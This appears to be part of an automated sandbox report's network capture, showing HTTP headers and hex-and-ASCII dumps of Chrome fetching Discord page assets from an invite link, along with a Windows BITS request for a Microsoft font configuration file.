                                                                                                                                                                                                                                                                                    Data Ascii: c0LDY1LDE4NQ==">window.__OVERLAY__=/overlay/.test(location.pathname)</script><script nonce="MTA4LDIyMiw2NiwxODIsMTI2LDc0LDY1LDE4NQ==">window.__BILLING_STANDALONE__=/^\/billing/.test(location.pathname)</script><script nonce="MTA4LDIyMiw2NiwxODIsMTI2LDc0LDY
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1369INData Raw: 69 73 63 6f 72 64 2e 67 67 27 2c 0a 20 20 20 20 20 20 53 45 4e 54 52 59 5f 54 41 47 53 3a 20 7b 22 62 75 69 6c 64 49 64 22 3a 22 35 63 62 61 30 66 65 62 66 33 32 31 66 37 36 31 30 39 62 35 38 61 36 66 64 39 31 39 63 37 34 36 63 66 36 37 36 30 32 63 22 2c 22 62 75 69 6c 64 54 79 70 65 22 3a 22 6e 6f 72 6d 61 6c 22 7d 2c 0a 20 20 20 20 20 20 4d 49 47 52 41 54 49 4f 4e 5f 53 4f 55 52 43 45 5f 4f 52 49 47 49 4e 3a 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 4d 49 47 52 41 54 49 4f 4e 5f 44 45 53 54 49 4e 41 54 49 4f 4e 5f 4f 52 49 47 49 4e 3a 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 48 54 4d 4c 5f 54 49 4d 45 53 54 41 4d 50 3a 20 44 61 74 65 2e 6e 6f 77 28
                                                                                                                                                                                                                                                                                    Data Ascii: iscord.gg', SENTRY_TAGS: {"buildId":"5cba0febf321f76109b58a6fd919c746cf67602c","buildType":"normal"}, MIGRATION_SOURCE_ORIGIN: 'https://discordapp.com', MIGRATION_DESTINATION_ORIGIN: 'https://discord.com', HTML_TIMESTAMP: Date.now(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC1282INData Raw: 28 6e 29 7d 2c 77 69 6e 64 6f 77 2e 5f 77 73 3d 7b 77 73 3a 65 2c 73 74 61 74 65 3a 77 7d 7d 7d 7d 28 29 3c 2f 73 63 72 69 70 74 3e 20 20 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 77 65 62 4d 69 6e 69 6d 61 6c 2e 33 64 39 38 65 34 34 36 63 33 30 32 62 32 62 34 32 34 32 33 2e 6a 73 22 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 73 65 6e 74 72 79 2e 30 61 37 35 35 34 37 37 32 33 66 61 33 36 39 38 63 31 32 35 2e 6a 73 22 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 54 41 34 4c 44 49 79 4d 69 77 32 4e 69 77 78 4f 44 49 73 4d 54 49 32 4c 44 63 30 4c 44 59 31 4c 44 45 34 4e 51 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                    Data Ascii: (n)},window._ws={ws:e,state:w}}}}()</script> <script src="/assets/webMinimal.3d98e446c302b2b42423.js" defer></script><script src="/assets/sentry.0a75547723fa3698c125.js" defer></script><script nonce="MTA4LDIyMiw2NiwxODIsMTI2LDc0LDY1LDE4NQ==">(function(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.5497162.23.161.164443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:13 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:13 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                    X-CID: 11
                                                                                                                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                    X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=220809
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:13 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:13 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    4192.168.2.549718162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:13 UTC883OUTGET /assets/69646.32a83a0c7e0a41f066e8.css HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:13 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                    Content-Length: 1357376
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d01b1f811821-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "e081b4eb2a86c860ae7b87266a4995b6"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 22 Nov 2024 03:07:47 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tZFUcGe7wcJW3NrP0F%2BPzabtqdzjzed4aWTLUHfXUxuXSXA7k%2FnSyd0snsbWrXCAGq%2Bcv8CfWi3kklJjvX6XGmRKvo5boY5VgIgPk6TblVnpFQW8phPpBA2xxQhH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC412INData Raw: 2e 61 6e 63 68 6f 72 5f 61 66 34 30 34 62 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 65 78 74 2d 6c 69 6e 6b 29 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 6c 69 6e 6b 2d 64 65 63 6f 72 61 74 69 6f 6e 29 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 6c 69 6e 6b 2d 64 65 63 6f 72 61 74 69 6f 6e 29 7d 2e 6c 6f 77 2d 73 61 74 75 72 61 74 69 6f 6e 20 2e 61 6e 63 68 6f 72 5f 61 66 34 30 34 62 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 65 78 74 2d 6c 69 6e 6b 2d 6c 6f 77 2d 73 61 74 75 72 61 74 69 6f 6e 29 7d 2e 61 6e 63 68 6f 72 55 6e 64 65 72 6c 69 6e 65 4f 6e 48 6f 76 65 72 5f 61 66 34 30 34 62 3a 68 6f 76 65 72 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75
                                                                                                                                                                                                                                                                                    Data Ascii: .anchor_af404b{color:var(--text-link);-webkit-text-decoration:var(--link-decoration);text-decoration:var(--link-decoration)}.low-saturation .anchor_af404b{color:var(--text-link-low-saturation)}.anchorUnderlineOnHover_af404b:hover{-webkit-text-decoration:u
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 43 61 6e 76 61 73 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 65 6e 61 62 6c 65 2d 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 20 2e 61 6e 63 68 6f 72 5f 61 66 34 30 34 62 20 73 76 67 2c 2e 65 6e 61 62 6c 65 2d 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 20 2e 61 6e 63 68 6f 72 55 6e 64 65 72 6c 69 6e 65 4f 6e 48 6f 76 65 72 5f 61 66 34 30 34 62 20 73 76 67 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 7d 2e 65 6e 61 62 6c 65 2d 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 20 2e 61 6e 63 68 6f 72 5f 61 66 34 30 34 62 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 2c 2e 65 6e 61 62 6c 65 2d 66 6f 72 63
                                                                                                                                                                                                                                                                                    Data Ascii: und-color:Canvas;-webkit-text-decoration:underline;text-decoration:underline}.enable-forced-colors .anchor_af404b svg,.enable-forced-colors .anchorUnderlineOnHover_af404b svg{color:currentColor}.enable-forced-colors .anchor_af404b:not([href]),.enable-forc
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 74 3a 2d 31 32 34 7d 7d 2e 73 70 69 6e 6e 65 72 5f 62 36 64 62 32 30 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 69 6e 6e 65 72 5f 62 36 64 62 32 30 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 33 32 70 78 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 63 6f 6e 74 61 69 6e 3a 70 61 69 6e 74 7d 2e 77 61 6e 64 65 72 69 6e 67 43 75 62 65 73 5f 62 36 64 62 32 30 20 2e 69 74 65 6d 5f 62 36 64 62 32 30 7b 62 61 63 6b 67 72 6f 75 6e
                                                                                                                                                                                                                                                                                    Data Ascii: t:-124}}.spinner_b6db20{display:flex;justify-content:center;align-items:center}.inner_b6db20{position:relative;display:inline-flex;align-items:center;justify-content:center;width:32px;height:32px;contain:paint}.wanderingCubes_b6db20 .item_b6db20{backgroun
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 6e 3a 73 70 69 6e 6e 65 72 2d 6c 6f 77 2d 6d 6f 74 69 6f 6e 5f 62 36 64 62 32 30 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 77 69 64 74 68 3a 36 70 78 3b 68 65 69 67 68 74 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 6e 6f 72 6d 61 6c 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 70 61 63 69 74 79 3a 2e 33 7d 2e 6c 6f 77 4d 6f 74 69 6f 6e 5f 62 36 64 62 32 30 20 2e 69 74 65 6d 5f 62 36 64 62 32 30 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 32 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 32 73 7d 2e 6c 6f 77
                                                                                                                                                                                                                                                                                    Data Ascii: n:spinner-low-motion_b6db20 1.4s infinite ease-in-out;width:6px;height:6px;margin-right:2px;background-color:var(--interactive-normal);border-radius:3px;display:inline-block;opacity:.3}.lowMotion_b6db20 .item_b6db20:nth-of-type(2){animation-delay:.2s}.low
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 64 61 72 6b 7b 2d 2d 62 72 69 67 68 74 6e 65 73 73 3a 63 61 6c 63 28 31 2e 35 20 2d 20 76 61 72 28 2d 2d 73 61 74 75 72 61 74 69 6f 6e 2d 66 61 63 74 6f 72 2c 20 31 29 20 2a 20 30 2e 35 29 3b 2d 2d 63 6f 6e 74 72 61 73 74 3a 76 61 72 28 2d 2d 73 61 74 75 72 61 74 69 6f 6e 2d 66 61 63 74 6f 72 2c 20 31 29 7d 2e 74 68 65 6d 65 2d 6c 69 67 68 74 7b 2d 2d 62 72 69 67 68 74 6e 65 73 73 3a 63 61 6c 63 28 30 2e 35 20 2b 20 76 61 72 28 2d 2d 73 61 74 75 72 61 74 69 6f 6e 2d 66 61 63 74 6f 72 2c 20 31 29 20 2a 20 30 2e 35 29 3b 2d 2d 63 6f 6e 74 72 61 73 74 3a 76 61 72 28 2d 2d 73 61 74 75 72 61 74 69 6f 6e 2d 66 61 63 74 6f 72 2c 20 31 29 7d 2e 64 65 73 61 74 75 72 61 74 65 2d 75 73 65 72 2d 63 6f 6c 6f 72 73 20 2e 64 65 73 61 74 75 72 61 74 65 55 73 65 72 43 6f
                                                                                                                                                                                                                                                                                    Data Ascii: dark{--brightness:calc(1.5 - var(--saturation-factor, 1) * 0.5);--contrast:var(--saturation-factor, 1)}.theme-light{--brightness:calc(0.5 + var(--saturation-factor, 1) * 0.5);--contrast:var(--saturation-factor, 1)}.desaturate-user-colors .desaturateUserCo
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 2d 73 74 6f 70 29 2c 74 72 61 6e 73 70 61 72 65 6e 74 20 76 61 72 28 2d 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 2d 73 74 6f 70 29 29 7d 2e 6c 6f 6f 6b 46 69 6c 6c 65 64 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 42 72 61 6e 64 5f 64 64 34 66 38 35 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 66 69 6c 6c 65 64 2d 62 72 61 6e 64 2d 74 65 78 74 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 66 69 6c 6c 65 64 2d 62 72 61 6e 64 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7d 2e 6c 6f 6f 6b 46 69 6c 6c 65 64 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 42 72 61 6e 64 5f 64 64 34 66 38 35 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28
                                                                                                                                                                                                                                                                                    Data Ascii: -stop),transparent var(--custom-button-link-underline-stop))}.lookFilled_dd4f85.colorBrand_dd4f85{color:var(--button-filled-brand-text);background-color:var(--button-filled-brand-background)}.lookFilled_dd4f85.colorBrand_dd4f85:hover{background-color:var(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 29 7d 2e 6c 6f 6f 6b 4f 75 74 6c 69 6e 65 64 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 42 72 61 6e 64 5f 64 64 34 66 38 35 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 62 72 61 6e 64 2d 74 65 78 74 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 62 72 61 6e 64 2d 62 6f 72 64 65 72 29 7d 2e 6c 6f 6f 6b 4f 75 74 6c 69 6e 65 64 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 42 72 61 6e 64 5f 64 64 34 66 38 35 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 62 72 61 6e 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 68 6f 76 65 72 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62
                                                                                                                                                                                                                                                                                    Data Ascii: )}.lookOutlined_dd4f85.colorBrand_dd4f85{color:var(--button-outline-brand-text);border-color:var(--button-outline-brand-border)}.lookOutlined_dd4f85.colorBrand_dd4f85:hover{background-color:var(--button-outline-brand-background-hover);border-color:var(--b
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 68 6f 76 65 72 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 62 6f 72 64 65 72 2d 68 6f 76 65 72 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 2d 68 6f 76 65 72 29 7d 2e 6c 6f 6f 6b 4f 75 74 6c 69 6e 65 64 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 50 72 69 6d 61 72 79 5f 64 64 34 66 38 35 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75
                                                                                                                                                                                                                                                                                    Data Ascii: or:var(--button-outline-primary-background-hover);border-color:var(--button-outline-primary-border-hover);color:var(--button-outline-primary-text-hover)}.lookOutlined_dd4f85.colorPrimary_dd4f85:active{background-color:var(--button-outline-primary-backgrou
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 6c 6f 6f 6b 4f 75 74 6c 69 6e 65 64 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 4c 69 6e 6b 5f 64 64 34 66 38 35 20 2e 73 70 69 6e 6e 65 72 49 74 65 6d 5f 64 64 34 66 38 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 65 78 74 2d 6c 69 6e 6b 29 7d 2e 6c 6f 6f 6b 4c 69 6e 6b 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 4c 69 6e 6b 5f 64 64 34 66 38 35 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 65 78 74 2d 6c 69 6e 6b 29 7d 2e 6c 6f 6f 6b 4c 69 6e 6b 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 4c 69 6e 6b 5f 64 64 34 66 38 35 3a 68 6f 76 65 72 20 2e 63 6f 6e 74 65 6e 74 73 5f 64 64 34 66 38 35 7b 2d 2d 62 75 74 74 6f 6e 2d 2d 75 6e 64 65 72 6c 69 6e 65 2d
                                                                                                                                                                                                                                                                                    Data Ascii: background-color:transparent}.lookOutlined_dd4f85.colorLink_dd4f85 .spinnerItem_dd4f85{background-color:var(--text-link)}.lookLink_dd4f85.colorLink_dd4f85{color:var(--text-link)}.lookLink_dd4f85.colorLink_dd4f85:hover .contents_dd4f85{--button--underline-
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 66 38 35 2e 63 6f 6c 6f 72 57 68 69 74 65 5f 64 64 34 66 38 35 20 2e 73 70 69 6e 6e 65 72 49 74 65 6d 5f 64 64 34 66 38 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 2e 6c 6f 6f 6b 4c 69 6e 6b 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 57 68 69 74 65 5f 64 64 34 66 38 35 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 2e 6c 6f 6f 6b 4c 69 6e 6b 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 57 68 69 74 65 5f 64 64 34 66 38 35 3a 68 6f 76 65 72 20 2e 63 6f 6e 74 65 6e 74 73 5f 64 64 34 66 38 35 7b 2d 2d 62 75 74 74 6f 6e 2d 2d 75 6e 64 65 72 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 2e 6c 6f 6f 6b 4c 69 6e 6b 5f 64 64 34 66 38 35 2e 63 6f 6c 6f 72 57 68 69 74 65 5f 64 64 34 66
                                                                                                                                                                                                                                                                                    Data Ascii: f85.colorWhite_dd4f85 .spinnerItem_dd4f85{background-color:var(--white)}.lookLink_dd4f85.colorWhite_dd4f85{color:var(--white)}.lookLink_dd4f85.colorWhite_dd4f85:hover .contents_dd4f85{--button--underline-color:var(--white)}.lookLink_dd4f85.colorWhite_dd4f


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    5192.168.2.549717162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:13 UTC873OUTGET /assets/webMinimal.3d98e446c302b2b42423.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC963INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 13439139
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d01b3a450f71-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "a4da9a05edcc0a143cfb01e6a2ea6c82"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8g0pfJnOZ3iF3vfIaBLAIV%2FbdRTR6wdQpIjBzHwN6q7gjYoBlDp387IeUwHbu9q2WnQx0234xUVjYjNUxZUQZnCrhEeSwXmEd37eGHOyQ%2FAzletkJFKF8msptCh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
